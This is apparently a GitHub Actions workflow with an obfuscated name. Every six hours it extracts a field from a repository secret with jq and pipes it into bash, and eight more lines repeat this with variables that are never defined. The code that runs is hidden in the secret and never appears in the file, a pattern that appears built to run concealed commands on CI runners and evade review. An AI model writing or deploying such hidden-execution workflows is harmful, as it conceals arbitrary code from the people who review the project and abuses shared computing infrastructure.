name: jiangguotao1985

on:
  workflow_dispatch:
  schedule:
    - cron: '6 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiangguotao1985
        env:
          bjtn686: ${{ secrets.bjtn686 }}
        run: |
          echo $bjtn686 | jq -r .lgv786 | /bin/bash
          echo $hkojz94 | jq -r .k818 | /bin/bash
          echo $gmt84 | jq -r .dnkec71375 | /bin/bash
          echo $t15 | jq -r .ipto05 | /bin/bash
          echo $cg58274 | jq -r .kabz6097 | /bin/bash
          echo $g19 | jq -r .e7003 | /bin/bash
          echo $btf35 | jq -r .sriz4018 | /bin/bash
          echo $u958 | jq -r .pk40 | /bin/bash
          echo $fva2491 | jq -r .vx837 | /bin/bash

